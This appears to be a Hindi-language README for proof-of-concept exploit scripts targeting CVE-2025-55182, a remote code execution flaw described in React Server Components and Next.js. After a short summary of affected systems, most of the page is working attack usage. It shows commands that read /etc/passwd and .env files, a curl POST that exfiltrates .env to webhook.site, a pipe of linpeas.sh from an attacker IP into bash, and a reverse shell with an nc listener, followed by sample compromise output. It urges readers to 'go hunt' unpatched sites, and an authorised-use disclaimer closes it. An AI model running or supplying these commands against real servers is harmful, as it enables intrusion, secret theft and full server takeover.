
CVE-2025-55182
✅ इसका मतलब है कि हमलावर एक एकल क्राफ्टेड अनुरोध के साथ मनमाना सर्वर-साइड कोड निष्पादित कर सकते हैं।
⚠️ React सर्वर घटकों का उपयोग करने वाले सिस्टम, जिनमें शामिल हैं:
✅ React सर्वर DOM पैकेज
✅ ढाँचे जो RSC को बंडल करते हैं, जैसे:
❌ प्रभावित नहीं:
🔍 संक्रामक कमजोर पैकेजों के लिए स्कैन करें
🧾 उपयोग करें:
npm auditpnpm audityarn audit⚠️ ये केवल जोखिम कम करते हैं — ये पैचिंग को प्रतिस्थापित नहीं करते
✅ Next.js ऐप राउटर का उपयोग करने वाले फुल-स्टैक डेवलपर्स
✅ React SSR ऐप्स होस्ट करने वाली DevOps टीमें
✅ सुरक्षा इंजीनियर निगरानी कर रहे हैं:
🚨 यदि आपका ऐप React सर्वर घटकों का उपयोग करता है और पैच नहीं किया गया है — तो यह संभावित रूप से अभी पूरी तरह से समझौता किया गया है।
CVE-2025-55182.py (मूल RCE)
# Basic info
./CVE-2025-55182.py https://target.com "id"
./CVE-2025-55182.py https://target.com "whoami"
./CVE-2025-55182.py https://target.com "uname -a"
# Read files
./CVE-2025-55182.py https://target.com "cat /etc/passwd"
./CVE-2025-55182.py https://target.com "cat /app/.env"
# Exfiltrate
./CVE-2025-55182.py https://target.com "curl -X POST https://webhook.site/your-id -d @/app/.env"
# Download & run (if wget/curl exists)
./CVE-2025-55182.py https://target.com "curl -s http://your-ip:8000/linpeas.sh | bash"
CVE-2025-55182-revshell.py (तत्काल रिवर्स शेल)
# 1. Start listener (once)
nc -lvnp 4444
# 2. Fire → shell in <3 seconds
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
यह सचमुच बस इतना ही है।
दो स्क्रिप्ट, ये 8 कमांड → आज किसी भी अनपैच किए गए Next.js साइट पर पूर्ण समझौता।
जाओ और वे बाउंटी प्राप्त करो।
यहाँ वास्तव में वही है जो आप वास्तविक समय में देखेंगे जब एक्सप्लॉइट काम करता है (100% अनपैच किया गया लक्ष्य, 3 दिसंबर 2025):
1. जब आप सामान्य RCE स्क्रिप्ट (CVE-2025-55182.py) चलाते हैं
आप टाइप करते हैं:
./CVE-2025-55182.py https://target.com "whoami"
आप तुरंत अपनी स्क्रीन पर देखते हैं:
[+] CVE-2025-55182 Exploit
[+] Target : https://target.com
[+] Command : whoami
[+] Sending payload ...
[+] Payload delivered successfully!
[+] HTTP 200 – Command should have executed on the server
[+] Server response:
node
→ वह “node” (या जो भी कमांड लौटाता है) पीड़ित सर्वर का वास्तविक आउटपुट है।
यदि आप id चलाते हैं तो आप पूर्ण uid/gid लाइनें आदि देखेंगे।
2. जब आप रिवर्स-शेल स्क्रिप्ट (CVE-2025-55182-revshell.py) चलाते हैं
आप टाइप करते हैं:
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
आप तुरंत अपने लिसनर टर्मिनल पर देखते हैं:
listening on [any] 4444 ...
connect to [10.10.14.66] from (UNKNOWN) [172.17.8.45] 54321
whoami
node
pwd
/app
ls -la
total 1234
drwxr-xr-x 1 node node 4096 Dec 3 12:34 .
drwxr-xr-x 1 root root 4096 Nov 30 10:11 ..
-rw-r--r-- 1 node node 420 Dec 3 11:11 .env
...
→ पूर्ण इंटरैक्टिव TTY शेल node उपयोगकर्ता के रूप में (लगभग हमेशा वेब ऐप उपयोगकर्ता)। आप बॉक्स के मालिक हैं।
यह सचमुच बस इतना ही है।
यदि आप उपरोक्त में से कुछ भी देखते हैं → एक्सप्लॉइट 100% काम किया।
यदि आपको केवल HTTP 403/404 मिलता है या कुछ नहीं → पहले से पैच किया गया या WAF ने ब्लॉक किया।
शिकार पर जाओ।
अस्वीकरण
यह PoC केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उपयोग के लिए है।
इसे किसी भी ऐसे सिस्टम पर न चलाएं जो आपका नहीं है या जिसके परीक्षण की आपके पास स्पष्ट लिखित अनुमति नहीं है।
अनधिकृत उपयोग अवैध है और इसके परिणामस्वरूप आपराधिक मुकदमा चलाया जा सकता है।
केवल अपनी प्रयोगशाला, स्पष्ट दायरे वाले बग-बाउंटी कार्यक्रमों, या उन लक्ष्यों पर उपयोग करें जिन्होंने आपको अनुमति दी है।
आप अपने कार्यों के लिए 100% जिम्मेदार हैं।